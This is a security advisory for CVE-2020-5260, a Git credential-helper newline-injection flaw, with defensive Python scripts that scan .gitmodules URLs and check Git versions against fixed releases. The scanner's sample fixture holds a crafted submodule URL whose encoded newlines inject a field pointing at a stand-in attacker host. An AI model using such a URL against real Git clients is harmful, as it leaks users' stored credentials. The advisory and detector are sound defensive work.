CVE-2020-5260
📋 TL;DR
CVE-2020-5260 is a Git vulnerability where specially crafted URLs with encoded newlines can trick Git into sending private credentials to attacker-controlled servers. This affects Git clients using credential helpers, potentially exposing stored credentials. The vulnerability primarily impacts automated systems like Git submodules or package managers that clone URLs without user interaction.
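The mechanism behind this advisory is that Git's credential helper protocol is line-oriented (one `key=value` per line), so a URL whose percent-decoded form contains a newline can smuggle an extra field such as `host=` into the request Git hands to the helper. The following is an added example, not code from Git or from this advisory, showing the pre-flight check an automated system (a CI job, a package manager, a submodule updater) can run over its `.gitmodules` before cloning: decode each URL once and refuse any that yields a CR, LF or NUL. The `.gitmodules` content and hostnames are constructed for the example; `url_newline_injection`, `submodule_urls` and `check_gitmodules` are names chosen here.

```python
import re
from urllib.parse import unquote

# Constructed .gitmodules content for the example. The second entry carries a
# percent-encoded newline (%0a) in its URL, the pattern this advisory describes.
SAMPLE_GITMODULES = """\
[submodule "libfoo"]
\tpath = vendor/libfoo
\turl = https://git.example.com/libfoo.git
[submodule "libbar"]
\tpath = vendor/libbar
\turl = https://git.example.com/?%0ahost=attacker.example.net%0a/libbar.git
"""

# Bytes that break a line-oriented key=value protocol.
_CONTROL = re.compile(r"[\r\n\x00]")


def url_newline_injection(url: str) -> bool:
    """Return True if the URL, raw or percent-decoded, contains CR, LF or NUL.

    The URL is decoded exactly once, matching how a client would unquote it
    before building the credential request; a double-encoded %250a decodes to
    the harmless literal text '%0a' and is therefore accepted.
    """
    return bool(_CONTROL.search(url) or _CONTROL.search(unquote(url)))


def submodule_urls(gitmodules_text: str) -> dict:
    """Minimal .gitmodules reader: map submodule name -> url."""
    urls = {}
    name = None
    for raw in gitmodules_text.splitlines():
        line = raw.strip()
        m = re.match(r'\[submodule "(.+)"\]', line)
        if m:
            name = m.group(1)
            continue
        if name is not None and line.startswith("url"):
            key, _, value = line.partition("=")
            if key.strip() == "url":
                urls[name] = value.strip()
    return urls


def check_gitmodules(gitmodules_text: str) -> list:
    """Names of submodules whose URL would inject into the credential protocol."""
    return [name for name, url in submodule_urls(gitmodules_text).items()
            if url_newline_injection(url)]


if __name__ == "__main__":
    flagged = check_gitmodules(SAMPLE_GITMODULES)
    for name in flagged:
        print(f"refusing submodule {name!r}: URL decodes to a control character")
    raise SystemExit(1 if flagged else 0)
```

Run this before `git submodule update` in any unattended pipeline; a non-zero exit stops the clone before a credential helper is ever consulted. It complements, rather than replaces, upgrading to a patched Git, which performs the equivalent refusal itself.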
💻 Affected Systems
- Git
📦 What is this software?
- Fedora by Fedoraproject
- Git by Git
- Git by Git Scm
- Leap by Opensuse
- Ubuntu Linux by Canonical
⚠️ Risk & Real-World Impact
Worst Case
Attackers steal credentials for any Git repository the user has access to, potentially compromising source code, CI/CD pipelines, or other systems using those credentials.
Likely Case
Credential theft from automated systems cloning malicious URLs, leading to unauthorized access to private repositories.
If Mitigated
Limited impact if systems use patched Git versions or avoid credential helpers for sensitive operations.
🎯 Exploit Status
Exploitation requires tricking users into cloning malicious URLs or affecting automated systems. Proof-of-concept code is publicly available.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1 or later
Vendor Advisory: https://git-scm.com/docs/git-credential
Restart Required: No
Instructions:
1. Update Git to a patched version using your package manager.
2. For Linux: run apt-get update && apt-get upgrade git, or yum update git.
3. For Windows/macOS: download the latest version from git-scm.com.
4. Verify the update with git --version.
🔧 Temporary Workarounds
Disable credential helpers
Temporarily disable credential helpers to prevent credential leakage
git config --global credential.helper ""
Use SSH instead of HTTPS
Use SSH URLs for Git operations instead of HTTPS to avoid credential helper issues
git remote set-url origin git@github.com:user/repo.git
🧯 If You Can't Patch
- Avoid cloning untrusted Git URLs, especially in automated systems
- Monitor Git credential helper logs for suspicious activity
🔍 How to Verify
Check if Vulnerable:
Run git --version and compare with affected versions list
Check Version:
git --version
Verify Fix Applied:
Ensure the installed Git version is at or above the patched release for its maintenance branch (for example 2.17.4 on the 2.17 series, 2.26.1 on the 2.26 series)
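Because each maintenance branch has its own fixed release, a plain "newer than X" comparison gives wrong answers (2.26.0 is vulnerable while 2.17.4 is fixed). The following is an added example, not code from Git or from this advisory, that parses `git --version` output and applies the per-branch list above; `parse_git_version` and `is_fixed` are names chosen here. One caveat the version number cannot tell you: distribution packages (the Debian, Ubuntu, Fedora and SUSE advisories in the references) typically backport the fix without changing the upstream version string, so for a distro-packaged Git consult the package changelog rather than this check alone.

```python
import re
import subprocess

# Fixed patch level per maintenance branch, taken from the advisory's patch list.
FIXED = {
    (2, 17): 4, (2, 18): 3, (2, 19): 4, (2, 20): 3, (2, 21): 2,
    (2, 22): 3, (2, 23): 2, (2, 24): 2, (2, 25): 3, (2, 26): 1,
}


def parse_git_version(output: str) -> tuple:
    """Extract (major, minor, patch) from `git --version` output.

    Handles vendor suffixes such as 'git version 2.24.3 (Apple Git-128)'
    and 'git version 2.26.0.windows.1'.
    """
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", output)
    if not m:
        raise ValueError(f"unrecognised git version output: {output!r}")
    return tuple(int(x) for x in m.groups())


def is_fixed(output: str) -> bool:
    """True if the reported upstream version carries the CVE-2020-5260 fix."""
    major, minor, patch = parse_git_version(output)
    branch = (major, minor)
    if branch in FIXED:
        return patch >= FIXED[branch]
    # Branches newer than 2.26 were cut after the fix; branches older than
    # 2.17 have no fixed release in the advisory and are treated as vulnerable.
    return branch > (2, 26)


def check_installed_git() -> bool:
    """Run the local git binary and evaluate its version string."""
    output = subprocess.run(["git", "--version"], capture_output=True,
                            text=True, check=True).stdout
    return is_fixed(output)


if __name__ == "__main__":
    try:
        print("fixed" if check_installed_git() else "VULNERABLE (by upstream version)")
    except FileNotFoundError:
        print("git not found on PATH")
```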
📡 Detection & Monitoring
Log Indicators:
- Unusual credential helper requests
- Git operations to unexpected domains
- Failed authentication attempts after credential exposure
Network Indicators:
- Git HTTPS traffic to unknown or suspicious domains
- Credential transmission to non-repository hosts
SIEM Query:
source="git.log" AND ("credential helper" OR "authentication failed")
🔗 References
- http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00027.html
- http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00003.html
- http://packetstormsecurity.com/files/157250/Git-Credential-Helper-Protocol-Newline-Injection.html
- http://www.openwall.com/lists/oss-security/2020/04/15/5
- http://www.openwall.com/lists/oss-security/2020/04/15/6
- http://www.openwall.com/lists/oss-security/2020/04/20/1
- https://github.com/git/git/commit/9a6bbee8006c24b46a85d29e7b38cfa79e9ab21b
- https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q
- https://lists.debian.org/debian-lts-announce/2020/04/msg00010.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/74Q7WVJ6FKLIN62VS2JD2XCNWK5TNKOW/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7TVS5UG6JD3MYIGSBKMIOS6AF7CR5IPI/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MOCTR2SEHCPSCOVUQJAGFPGKFMI2VE6V/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PN3FUOXKX3AXTULYV53ACABER2W2FSOU/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XPCEOIFLLEF24L6GLVJVFZX4CREDEHDF/
- https://lore.kernel.org/git/xmqqy2qy7xn8.fsf%40gitster.c.googlers.com/
- https://security.gentoo.org/glsa/202004-13
- https://support.apple.com/kb/HT211141
- https://usn.ubuntu.com/4329-1/
- https://www.debian.org/security/2020/dsa-4657